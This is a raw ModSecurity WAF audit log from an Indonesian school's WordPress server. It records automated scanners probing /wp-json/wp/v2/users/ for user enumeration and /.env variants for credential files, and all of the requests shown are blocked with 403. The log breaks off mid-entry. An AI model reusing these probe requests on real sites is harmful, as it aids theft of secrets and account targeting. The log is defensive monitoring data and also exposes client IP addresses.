https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.122.201.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.122.201.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c683f73e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c683f73e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748816340826780 3162 (- - -) Stopwatch2: 1748816340826780 3162; combined=1341, p1=451, p2=860, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c683f73e-Z-- --36c0fb1c-A-- [02/Jun/2025:05:45:54 +0700] aDzYIn8VMK8tZef_-m_JigAAAE0 103.236.140.4 52436 103.236.140.4 8181 --36c0fb1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.123.207.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.123.207.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --36c0fb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c0fb1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748817954175911 3626 (- - -) Stopwatch2: 1748817954175911 3626; combined=1599, p1=547, p2=1013, p3=0, p4=0, p5=39, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c0fb1c-Z-- --879ec623-A-- [02/Jun/2025:06:24:51 +0700] aDzhQ38VMK8tZef_-m_JpAAAAEw 103.236.140.4 52696 103.236.140.4 8181 --879ec623-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.2.194.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.2.194.82 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --879ec623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --879ec623-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748820291437589 2302 (- - -) Stopwatch2: 1748820291437589 2302; combined=1078, p1=332, p2=714, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879ec623-Z-- --70771c58-A-- [02/Jun/2025:06:41:08 +0700] aDzlFO6eDjh4wF4csdtiRQAAAJI 103.236.140.4 52760 103.236.140.4 8181 --70771c58-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.67.184.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.67.184.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70771c58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70771c58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748821268749276 2904 (- - -) Stopwatch2: 1748821268749276 2904; combined=1305, p1=428, p2=847, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70771c58-Z-- --cb45a622-A-- [02/Jun/2025:07:08:08 +0700] aDzraO6eDjh4wF4csdtj3wAAAI4 103.236.140.4 58864 103.236.140.4 8181 --cb45a622-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.227.106.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.227.106.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb45a622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb45a622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748822888231826 3109 (- - -) Stopwatch2: 1748822888231826 3109; combined=1419, p1=506, p2=885, p3=0, p4=0, p5=28, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb45a622-Z-- --b40f2e59-A-- [02/Jun/2025:07:16:59 +0700] aDzteu6eDjh4wF4csdtkbwAAAIE 103.236.140.4 33712 103.236.140.4 8181 --b40f2e59-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --b40f2e59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b40f2e59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748823418999689 805 (- - -) Stopwatch2: 1748823418999689 805; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b40f2e59-Z-- --ce232040-A-- [02/Jun/2025:07:55:32 +0700] aDz2hEA6be0-boUGPH17gQAAANA 103.236.140.4 34060 103.236.140.4 8181 --ce232040-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.101.72.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.101.72.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce232040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce232040-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748825732586186 2497 (- - -) Stopwatch2: 1748825732586186 2497; combined=1079, p1=368, p2=682, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce232040-Z-- --4412b74e-A-- [02/Jun/2025:09:13:36 +0700] aD0I0O6eDjh4wF4csdtk8QAAAIU 103.236.140.4 34444 103.236.140.4 8181 --4412b74e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.61.106.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.61.106.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4412b74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4412b74e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748830416229839 2128 (- - -) Stopwatch2: 1748830416229839 2128; combined=1058, p1=331, p2=700, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4412b74e-Z-- --10130775-A-- [02/Jun/2025:09:22:26 +0700] aD0K4u6eDjh4wF4csdtk_QAAAIQ 103.236.140.4 34516 103.236.140.4 8181 --10130775-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.213.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.213.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10130775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10130775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748830946251211 3566 (- - -) Stopwatch2: 1748830946251211 3566; combined=1532, p1=545, p2=954, p3=0, p4=0, p5=32, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10130775-Z-- --49259e55-A-- [02/Jun/2025:09:41:18 +0700] aD0PTkA6be0-boUGPH174wAAAM4 103.236.140.4 35522 103.236.140.4 8181 --49259e55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.127.220.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.127.220.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --49259e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49259e55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748832078009966 3163 (- - -) Stopwatch2: 1748832078009966 3163; combined=1349, p1=378, p2=938, p3=0, p4=0, p5=32, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49259e55-Z-- --51e9f85c-A-- [02/Jun/2025:09:54:52 +0700] aD0SfEA6be0-boUGPH19LwAAANg 103.236.140.4 40888 103.236.140.4 8181 --51e9f85c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.67.184.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.67.184.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51e9f85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51e9f85c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748832892057546 2417 (- - -) Stopwatch2: 1748832892057546 2417; combined=1099, p1=345, p2=727, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51e9f85c-Z-- --b617964e-A-- [02/Jun/2025:10:22:00 +0700] aD0Y2EA6be0-boUGPH19PwAAAMI 103.236.140.4 41078 103.236.140.4 8181 --b617964e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.249.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.249.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b617964e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b617964e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748834520905895 3515 (- - -) Stopwatch2: 1748834520905895 3515; combined=1483, p1=497, p2=954, p3=0, p4=0, p5=31, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b617964e-Z-- --c29b174b-A-- [02/Jun/2025:11:15:53 +0700] aD0leX8VMK8tZef_-m_N4AAAAEM 103.236.140.4 41758 103.236.140.4 8181 --c29b174b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.236.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.236.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c29b174b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c29b174b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748837753011347 862 (- - -) Stopwatch2: 1748837753011347 862; combined=378, p1=340, p2=0, p3=0, p4=0, p5=38, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c29b174b-Z-- --9816e374-A-- [02/Jun/2025:11:40:46 +0700] aD0rTn8VMK8tZef_-m_bAwAAAFQ 103.236.140.4 39254 103.236.140.4 8181 --9816e374-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.32 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.32 Epiphany/3.8.2 Accept-Charset: utf-8 --9816e374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9816e374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748839246918507 786 (- - -) Stopwatch2: 1748839246918507 786; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9816e374-Z-- --4d1f2c0a-A-- [02/Jun/2025:11:55:53 +0700] aD0u2e6eDjh4wF4csdt7bQAAAIM 103.236.140.4 57612 103.236.140.4 8181 --4d1f2c0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.78.81.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.78.81.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d1f2c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d1f2c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748840153193242 3359 (- - -) Stopwatch2: 1748840153193242 3359; combined=1489, p1=472, p2=982, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d1f2c0a-Z-- --19b59d06-A-- [02/Jun/2025:12:15:54 +0700] aD0ziu6eDjh4wF4csdt7dwAAAJM 103.236.140.4 57742 103.236.140.4 8181 --19b59d06-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.71.175.236 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --19b59d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19b59d06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748841354856920 850 (- - -) Stopwatch2: 1748841354856920 850; combined=334, p1=299, p2=0, p3=0, p4=0, p5=34, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19b59d06-Z-- --0091804f-A-- [02/Jun/2025:12:31:42 +0700] aD03Pn8VMK8tZef_-m_gSwAAAFc 103.236.140.4 57892 103.236.140.4 8181 --0091804f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.230.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.230.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0091804f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0091804f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748842302079105 3084 (- - -) Stopwatch2: 1748842302079105 3084; combined=1321, p1=452, p2=834, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0091804f-Z-- --7f4adc01-A-- [02/Jun/2025:12:46:56 +0700] aD060NG4Cudp_oIcbnO6pwAAAAg 103.236.140.4 58016 103.236.140.4 8181 --7f4adc01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.216.50.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.216.50.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7f4adc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f4adc01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information 